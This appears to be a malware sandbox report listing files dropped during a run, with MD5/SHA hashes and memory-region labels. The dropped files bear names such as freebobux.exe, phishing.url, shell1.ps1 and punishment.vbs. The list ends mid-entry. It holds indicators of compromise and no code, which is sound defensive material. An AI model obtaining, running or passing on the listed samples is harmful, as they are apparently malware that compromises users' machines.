MD5 6838598368aa834d27e7663c5e81a6fa
SHA1 d4d2fc625670cb81e4c8e16632df32c218e183ce
SHA256 0e0e9bf5c3c81b522065e2c3bdc74e5c6e8c422230a1fe41f3bc7bef4f21604e
SHA512 f60cbad5f20418bb244206ae5754e16deac01f37f6cbbb5d0d7c916f0b0fef7bdeaf436a74056e2a2042e3d8b6c1da4bc976a32f604c7d80a57528583f6c5e47

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\cipher.cmd

MD5 c2fd32ef78ee860e8102749ae2690e44
SHA1 6707151d251074738f1dd0d19afc475e3ba28b7e
SHA256 9f7f2a48b65dc8712e037fdbbdeae00adad6a417750c76cdc3ea80bdd0fa1bc5
SHA512 395483f9394a447d4a5899680ca9e5b4813ac589a9d3ff25b940adaf13e000b0512895d60039948dc51c44a9954cfadac54fd9bd4294d7252acdec024eebc645

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ed64c9c085e9276769820a981139e3c2a7950845.dll

MD5 6eb191703124e29beca826ee2a0f2ed7
SHA1 a583c2239401a58fab2806029ef381a67c8ea799
SHA256 db6572b105c16b9bc657e457e13284926f28b40ea0c6736ae485c3cd0690110a
SHA512 c50fd03d1bf77b44c17d20fa8966d1f31ba7cea478f9fd6e0ffd862bcd039ed1a853138e2493ad7edeffa1ad512c96fdd54f66b25926a5687da580804440b045

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe

MD5 794b00893a1b95ade9379710821ac1a4
SHA1 85c7b2c351700457e3d6a21032dfd971ccb9b09d
SHA256 5ac42d75e244d33856971120a25bd77f2c0712177384dfa61fb90c0e7790d34c
SHA512 3774d4aed0cce7ed257d31a2bb65dda585d142c3c527dc32b40064d22d9d298dd183c52603561c9c1e96dd02737a8b2237c433cf7a74dccb0a25191446d60017

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\jkka.exe

MD5 42e4b26357361615b96afde69a5f0cc3
SHA1 35346fe0787f14236296b469bf2fed5c24a1a53d
SHA256 e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb
SHA512 fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Read Me.txt

MD5 1f2db4e83bbb8ed7c50b563fdfbe6af4
SHA1 94da96251e72d27849824b236e1cf772b2ee95fd
SHA256 44a2236b5c5fe30f599be03643129106852a061bb1546ff28ca82fa0a9c3b00b
SHA512 f41f0880443cd0bad0d98ed3ef8f4541840cb9de9d4bd0f7e354dc90d16c3077d8bb2559a362e6045e9abd478e4fd6a3333f536a518e3769952479dfff1d0b91

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\selfaware.exe

MD5 5cb9ba5071d1e96c85c7f79254e54908
SHA1 3470b95d97fb7f1720be55e033d479d6623aede2
SHA256 53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5
SHA512 70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll

MD5 a67128f0aa1116529c28b45a8e2c8855
SHA1 5fbaf2138ffc399333f6c6840ef1da5eec821c8e
SHA256 8dc7e5dac39d618c98ff9d8f19ecb1be54a2214e1eb76e75bd6a27873131d665
SHA512 660d0ced69c2c7dd002242c23c8d33d316850505fc30bad469576c97e53e59a32d13aa55b8b64459c180e7c76ea7f0dae785935f69d69bbd785ee7094bd9b94b

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\bloatware.cmd

MD5 6d974fcc6c9b0b69f1cff4cbc99d2413
SHA1 14f9a9e4c602ee3fef682a8fcf5679db8af9131e
SHA256 74905104c4160fbf6d238d5af8aafed3852f797d11c5a0ac8a39f69172d649b2
SHA512 dd412ef35d69d7c046ee8f59343cc43b0e23d89e552f52f43de7bddb1bfa457b900c488913d245031fd9853c6e99e5a6ac36654cd4d9d87b101ad5806760a00d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe

MD5 50b9d2aea0106f1953c6dc506a7d6d0a
SHA1 1317c91d02bbe65740524b759d3d34a57caff35a
SHA256 b0943c4928e44893029025bcc0973e5c8d7dbf71cc40d199a03c563ecb9d687d
SHA512 9581a98853f17226db96c77ae5ef281d8ba98cbc1db660a018b4bf45c9a9fb6c5a1aaaf4c2bae5d09f78a569ecb3e8162a4b77a9649a1f788a0dbdde99bd596c

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\2.hta

MD5 dda846a4704efc2a03e1f8392e6f1ffc
SHA1 387171a06eee5a76aaedc3664385bb89703cf6df
SHA256 e9dc9648d8fb7d943431459f49a7d9926197c2d60b3c2b6a58294fd75b672b25
SHA512 5cc5ad3fbdf083a87a65be76869bca844faa2d9be25657b45ad070531892f20d9337739590dd8995bca03ce23e9cb611129fe2f8457879b6263825d6df49da7a

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe

MD5 d952d907646a522caf6ec5d00d114ce1
SHA1 75ad9bacb60ded431058a50a220e22a35e3d03f7
SHA256 f92ad1e92780a039397fd62d04affe97f1a65d04e7a41c9b5da6dd3fd265967e
SHA512 3bfaee91d161de09c66ef7a85ad402f180624293cdc13d048edbeec5a3c4ad2bc84d5fde92383feb9b9f2d83e40a3e9ff27e81a32e605513611b6001f284b9fe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\xcer.cer

MD5 a58d756a52cdd9c0488b755d46d4df71
SHA1 0789b35fd5c2ef8142e6aae3b58fff14e4f13136
SHA256 93fc03df79caa40fa8a637d153e8ec71340af70e62e947f90c4200ccba85e975
SHA512 c31a9149701346a4c5843724c66c98aae6a1e712d800da7f2ba78ad9292ad5c7a0011575658819013d65a84853a74e548067c04c3cf0a71cda3ce8a29aad3423

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll

MD5 9191cec82c47fb3f7249ff6c4e817b34
SHA1 1d9854a78de332bc45c1712b0c3dac3fe6fda029
SHA256 55ef4ff325d653a53add0ca6c41bc3979cdb4fc3ef1c677998dc2c9ea263c15b
SHA512 2b482e947e26e636e7ed077b914788b1af8c28722efcbd481dd22940cfb771e38c3e2ed6c8f9208eb813085c7d4460978e13a5ef52441e7be7ada9f6414a6673

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web3.htm

MD5 9e118cccfa09666b2e1ab6e14d99183e
SHA1 e6d3ab646aa941f0ca607f12b968c1e45c1164b4
SHA256 d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942
SHA512 da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web2.htm

MD5 1fc6bb77ac7589f2bffeaf09bcf7a0cf
SHA1 028bdda6b433e79e9fbf021b94b89251ab840131
SHA256 5d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1
SHA512 6ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web.htm

MD5 f63c0947a1ee32cfb4c31fcbc7af3504
SHA1 ee46256901fa8a5c80e4a859f0f486e84c61cbaa
SHA256 bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541
SHA512 1f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe

MD5 e45dcabc64578b3cf27c5338f26862f1
SHA1 1c376ec14025cabe24672620dcb941684fbd42b3
SHA256 b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA512 5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\stopwerfault.cmd

MD5 7eacd2dee5a6b83d43029bf620a0cafa
SHA1 9d4561fa2ccf14e05265c288d8e7caa7a3df7354
SHA256 d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b
SHA512 fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\spinner.gif

MD5 324f8384507560259aaa182eb0c7f94a
SHA1 3b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256 f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512 cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe

MD5 288a089f6b8fe4c0983259c6daf093eb
SHA1 8eafbc8e6264167bc73c159bea34b1cfdb30d34f
SHA256 3536c40290b9e7e9c3c47a96ab10fe3b737f334dd6779eaf70e35e91e10a677b
SHA512 c04bf3530cd471d589efb8f7e6bdddb39422fc4284afc7f2d3645a646ebbee170d57dc57eff30cee05ef091c64c6a98586c5a887d25fe53e49531c137d285448

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\shell1.ps1

MD5 29a3efd5dbe76b1c4bbc2964f9e15b08
SHA1 02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879
SHA256 923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129
SHA512 dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\screenshot.png

MD5 de8ddeeb9df6efab37b7f52fe5fb4988
SHA1 61f3aac4681b94928bc4c2ddb0f405b08a8ade46
SHA256 47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159
SHA512 6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe

MD5 97cd39b10b06129cb419a72e1a1827b0
SHA1 d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA256 6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512 266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe

MD5 63d052b547c66ac7678685d9f3308884
SHA1 a6e42e6a86e3ff9fec137c52b1086ee140a7b242
SHA256 8634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba
SHA512 565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe

MD5 5c4d7e6d02ec8f694348440b4b67cc45
SHA1 be708ac13886757024dd2288ddd30221aed2ed86
SHA256 faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018
SHA512 71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\readme.md

MD5 5ae93516939cd47ccc5e99aa9429067c
SHA1 3579225f7f8c066994d11b57c5f5f14f829a497f
SHA256 f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589
SHA512 c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\punishment.vbs

MD5 c38e912e4423834aba9e3ce5cd93114b
SHA1 eab7bf293738d535bb447e375811d6daccc37a11
SHA256 c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1
SHA512 5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\punishment.cmd

MD5 c8d2a5c6fe3c8efa8afc51e12cf9d864
SHA1 5d94a4725a5eebb81cfa76100eb6e226fa583201
SHA256 c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb
SHA512 59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\phishing.url

MD5 6f62e208aad51e2d5ef2a12427b36948
SHA1 453eaf5afef9e82e2f50e0158e94cc1679b21bea
SHA256 cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b
SHA512 f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Macro_blank.png

MD5 d388dfd4f8f9b8b31a09b2c44a3e39d7
SHA1 fb7d36907e200920fe632fb192c546b68f28c03a
SHA256 a917ddc25d483b737296f945b8b7701a08d4692d0d34417fe1b590caac28359c
SHA512 2fcff4775a0e93c53b525b44aadefe4532efd790c504d0343626a7322a7c99073ed645eb08bd13b31e752e09c13f07b74e43f0eb1c46be082efc948b34364401

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\lupa.png

MD5 0a9d964a322ad35b99505a03e962e39a
SHA1 1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51
SHA256 48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b
SHA512 c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\jaffa.exe

MD5 6b1b6c081780047b333e1e9fb8e473b6
SHA1 8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256 e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512 022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\install.exe

MD5 1e800303c5590d814552548aaeca5ee1
SHA1 1f57986f6794cd13251e2c8e17d9e00791209176
SHA256 7d815f37d808bc350a3c49810491d5df0382409347ebae7a3064a535d485c534
SHA512 138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\helper.vbs

MD5 7a97744bc621cf22890e2aebd10fd5c8
SHA1 1147c8df448fe73da6aa6c396c5c53457df87620
SHA256 153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA512 89c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\handler.cmd

MD5 c1e3b759a113d2e67d87468b079da7dc
SHA1 3b280e1c66c7008b4f123b3be3aeb635d4ab17c3
SHA256 b434261414e7c75437e8c47aba9a5b73fcb8cffbf0870998f50edc46084d1da5
SHA512 20a1494027a5cf10f4cc71722a7a4e685fc7714ba08598dd150c545f644e139ddb200fb0b5517f5491a70d8644e90c8f60e8c457bc5d8eb0bb451120b40b8447

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 443a627d539ca4eab732bad0cbe7332b
SHA1 86b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA256 1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512 923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

memory/3628-232-0x0000000005EA0000-0x00000000063F0000-memory.dmp

memory/3628-233-0x00000000069A0000-0x0000000006EEE000-memory.dmp

memory/3628-237-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-248-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-253-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-246-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-244-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-241-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-239-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-235-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-234-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-255-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-264-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-261-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-274-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-278-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-288-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-286-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-294-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-298-0x00000000069A0000-0x0000000006EE9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 99afa4934d1e3c56bbce114b356e8a99
SHA1 3f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA256 08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA512 76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

memory/3628-296-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-292-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-290-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-284-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-282-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-280-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-276-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-272-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-270-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-268-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-267-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-259-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-252-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-249-0x00000000069A0000-0x0000000006EE9000-memory.dmp

memory/3628-257-0x00000000069A0000-0x0000000006EE9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 96f833516ff06c9badd5f3f13a6bcec2
SHA1 dd720eff95ade59ed78d65729226109e9b0cd528
SHA256 49cb5d929a0f91a18c5320b2cbbafa4e2509ad18f7e50c321a8937c431ee8124
SHA512 946e841c44114c3e939be2e033b3c8ef61b2cab9fba85d2cdf9cdde471bc5aae27eb79b944c5901656f8cfa6e034aae6818c40d7e731357f2c9109f67245dc6c

memory/1656-446-0x00000000747DE000-0x00000000747DF000-memory.dmp

memory/1656-542-0x00000000747D0000-0x0000000074F80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b386f00948e773e4f250713da6617b9e
SHA1 8ec880a618f431a8aa01fb981eaa82a8de4c7bb6
SHA256 e7407a2d1ff6aab3bffed31e6e513c2700a28b8f1411f5e58cdf4bdd0aacf54c
SHA512 7365fa7d1e71bedf8c5ef729d3daa6cc6b043b755f156c3e2aadb1947a0c58079bae31d61cf4e32fd70726cad1a2b456a39491dfc045f311242869964ed3e709

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b9a409eb54b5d4a28bb5dd237d37cfd7
SHA1 9859911ac8642ddf18e681d5f5228fb91a98912b
SHA256 c91c392a06ead881a96e607728d25c33704365d2481c0eb66750ef57896850a0
SHA512 419181bf50bb201c038fa3a99e643e6a7be1757abc6aa956757fb65406f0818b24ce10b223bed8e53af3218eee6b015711170d704364b43bae013fd2a4255916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 98afec5c3738dfa0f8f0712dd55eea14
SHA1 6137b42b941ab19ef03023a2856a1146b9a61ca8
SHA256 fdecfb79297f5f3c495824fac61a09e39e550f8b86a50c256b5d924c1a04634d
SHA512 26506c72a58d84e88bd2c52918c5fea1f143583bde1f03ad231055a38574478c943285bc7d30189a904513ccf409bd7043078f772a2c30b4137a1356c4c27cf8

memory/1744-1229-0x000001A6467A0000-0x000001A6477A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2333e4cf4eed0360e1e4892447a9c7bd
SHA1 d4b2a4ec0281c9b78a209dbadfd5b516d0427a2c
SHA256 1ec3a78976d56ee79862b03c14437f0acb0e956974bf03ce6ea36279126f94dc
SHA512 06e389354e7a3e8d24a8d400c2508b38433d2ddde2345cfa905ff669070d594ed6c94fecab17d844f2eeade42403b9d307b37b0668d9025e2ceaa3269b3812e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 270d6f0e87b73d1090e1f7e5151f12ee
SHA1 5f33a31c2a9b21ad3abeba759d77671c7f8d3081
SHA256 1ac60b7e9b32e85e51d477f26a328ed6d997a44cb86f05010398c2f03de5d90f
SHA512 6ca8b8f09743784cb33203a51b5c786bf3ca772992c9aca1add3084423f2021c9fa33f10adc62fbfde39dcb48d1dbd7aa1acd8a761ec6365fc3da467594ec966

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c22b8fdb9d69a17c492f51d4822f3b67
SHA1 d6f33387d754ff4f974c8d6b1a033844c5a1f4da
SHA256 7eb24fe024a49849f5e4550c6e74ba681cce730c19c3146160f54e1c5ded3a5d
SHA512 22201d74d5b1fe54eb4218f08cad21d277ad67ffe8f4ee13f840156fb93ca40b1d7065d4ce6b1a8a7e6f47845537517eb753011e957013fc57517bd04564dc80

memory/3628-3308-0x0000000005D30000-0x0000000005DC2000-memory.dmp

memory/3628-3313-0x0000000005E30000-0x0000000005E3A000-memory.dmp

memory/3628-3374-0x000000000BCC0000-0x000000000C3A0000-memory.dmp

memory/5736-3412-0x0000000000D70000-0x0000000002397000-memory.dmp

C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

MD5 6bb0ab3bcd076a01605f291b23ac11ba
SHA1 c486e244a5458cb759b35c12b342a33230b19cdf
SHA256 959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908
SHA512 d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

memory/5736-3466-0x0000000000D70000-0x0000000002397000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 38dc18b20cb8e19ff84b8437eb259e18
SHA1 3ffe09cffac3b9d35cc6d4dc6910b0a91dea1f4e
SHA256 cf1987132e6abec1d4b5c662070217ef14ae1008fa69dcb274c1abfb2bf0cce8
SHA512 bca30f4fd17e4b6ddbe7644ca59422643cf87695402e04c7f07d85ee5632fa20d5c0660ba6af309ca9033c4855ad13a8d6305a11eb1e25d93cc9b9dbdad75456

memory/5720-3481-0x00000000000D0000-0x00000000003F4000-memory.dmp

memory/6424-3483-0x0000000002480000-0x00000000024A4000-memory.dmp

memory/6424-3482-0x00000000002E0000-0x000000000036A000-memory.dmp

memory/6596-3492-0x000000001C410000-0x000000001C460000-memory.dmp

memory/6596-3493-0x000000001C520000-0x000000001C5D2000-memory.dmp

memory/6924-3509-0x0000016F9FBF0000-0x0000016F9FC12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4k4e4yv0.jls.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 3a1707a75029a7d714539d6d57db7fe3
SHA1 0b6db8bdb9d7999473ffe9f2b694bf32e47aeaa3
SHA256 abb28f7e97d903c18fb6b5522a57dcc4a3fb8d4c3d568dd747706c7dd3bc5a00
SHA512 09cbb5e3e4fb82b61c2d153403e8c209b7f109f19fbbcaafb1bb592924333b5dcba4db393f3c996a78136fe31d66f139b77e9ea32d624890aae6f55cf8bc3073

memory/6924-3578-0x0000016F9FF20000-0x0000016F9FF2C000-memory.dmp

memory/6924-3579-0x0000016F9FF50000-0x0000016F9FFAC000-memory.dmp

memory/6700-3581-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\Pictures\l6lGezRTHj8HnL5T9Jiqd1RF.exe

MD5 588ec1603a527f59a9ecef1204568bf8
SHA1 5e81d422cda0defb546bbbdaef8751c767df0f29
SHA256 ba7bda2de36c9cab1835b62886b6df5ecbd930c653fac078246ce14c2c1c9b16
SHA512 969baab4b3828c000e2291c5ebe718a8fc43b6ce118ccc743766162c3a623f9e32a66fb963672b73a7386d0881340ba247f0aef0046cacbe56a7926900c77821

memory/2216-3604-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 06f13f50c4580846567a644eb03a11f2
SHA1 39ee712b6dfc5a29a9c641d92c7467a2c4445984
